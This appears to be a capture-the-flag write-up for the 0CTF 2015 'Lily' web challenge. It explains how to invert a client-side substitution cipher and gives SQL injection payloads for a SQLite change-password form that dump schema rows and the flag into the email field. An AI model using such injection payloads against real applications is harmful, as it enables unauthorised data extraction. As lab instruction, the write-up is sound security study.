Writeup: 0CTF 2015 - Lily

Information

  • Category: web
  • Points: 150

Description

Find a hidden note for Lily in the web service.

Writeup

The “change password” form is vulnerable to SQL injection.
Before it is submitted, the password is transformed client-side by a custom JavaScript function called encrypt (a fixed character substitution rather than real encryption, so it can be inverted).
The scripts are:

function post(path, params, method) {
    // Submit `params` to `path` as hidden fields of a throw-away HTML form.
    // This is the page's own helper for sending the change-password request;
    // `method` falls back to "post" when it is omitted or falsy.
    var verb = method || "post";
    var form = document.createElement("form");
    form.setAttribute("method", verb);
    form.setAttribute("action", path);

    // One hidden input per own property of `params`; inherited keys are skipped.
    for (var name in params) {
        if (!Object.prototype.hasOwnProperty.call(params, name)) {
            continue;
        }
        var field = document.createElement("input");
        field.setAttribute("type", "hidden");
        field.setAttribute("name", name);
        field.setAttribute("value", params[name]);
        form.appendChild(field);
    }

    // The form is attached to the document before submit() is called
    // (presumably because a detached form does not submit).
    document.body.appendChild(form);
    form.submit();
}
function encrypt(str)
{
    // The target's client-side password "encryption". It is a plain
    // substitution: build the sorted alphabet of distinct UTF-16 units that
    // occur in `str`, then replace every unit with the one floor(size / 2)
    // positions further along the alphabet, wrapping around. Because the
    // alphabet is derived from the input itself, the output uses exactly the
    // same set of characters, and applying encrypt twice is the identity only
    // when that set has an even number of entries (odd sizes end up rotated
    // by one position instead).
    var units = str.split("");
    var alphabet = [];
    units.slice().sort().forEach(function (ch) {
        // The copy is sorted, so duplicates are adjacent and only the most
        // recently added entry has to be compared.
        if (alphabet.length === 0 || alphabet[alphabet.length - 1] !== ch) {
            alphabet.push(ch);
        }
    });

    var size = alphabet.length;
    var shift = Math.floor(size / 2);

    // Precompute unit -> alphabet index instead of calling indexOf per unit.
    var position = Object.create(null);
    alphabet.forEach(function (ch, idx) {
        position[ch] = idx;
    });

    // Both the index and the shift are below `size`, so a single modulo
    // reproduces the original "subtract once if we ran past the end" step.
    return units.map(function (ch) {
        return alphabet[(position[ch] + shift) % size];
    }).join("");
}
// Round trip: this sentence contains 30 distinct characters (an even count),
// so a second call to encrypt() gives the original text back.
var s = encrypt("The quick BrowN fox JUMPS over the lazy dog.");
// s is "t.ygPUBwJgiSNcogzNdgkulqrgNaySgT.ygMvfegxN h"
encrypt(s);
// yields "The quick BrowN fox JUMPS over the lazy dog."

So, if we want a query fragment Q to reach the server, we submit the change-password request with encrypt(Q): the page runs encrypt() over the password field before sending it, and encrypt(encrypt(Q)) gives back Q. Note that this round trip only holds when Q contains an even number of distinct characters (the rotation is floor(length / 2), so an odd-sized alphabet ends up shifted by one); if a payload has an odd count, add one extra unused character or invert the substitution by hand.

Injection!

After a few probes we determined that the back-end DBMS was SQLite, which is why the schema is read from its sqlite_master table below.

// Close the password string literal, append extra SET assignments, and reopen
// the string through Username so the UPDATE still parses. Email is set to the
// `sql` column (the CREATE statement) of the second row of sqlite_master:
// SQLite reads `LIMIT 1,1` as offset 1, one row. The leaked schema is then
// read back wherever the account's email is shown (screenshot below).
// 'tito' is presumably the attacker's own account name — verify against the
// session used.
encrypt("', Email=(SELECT sql FROM sqlite_master LIMIT 1,1), Username='tito");

./get_desc_0.png

// Same technique, now restricted to table definitions (type='table') and
// taking the third such row (`LIMIT 2,1` = offset 2, one row). Stepping the
// offset lets the schema be enumerated one CREATE statement per request.
encrypt("', Email=(SELECT sql FROM sqlite_master WHERE type='table' LIMIT 2,1), Username='tito");

./get_desc_0.png

// With the table and column names known from the schema dumps, pull the flag
// into the Email column the same way. The subquery must return a single row
// for the assignment to succeed.
encrypt("', Email=(SELECT flag FROM flag), Username='tito");

Flag

./get_desc_0.png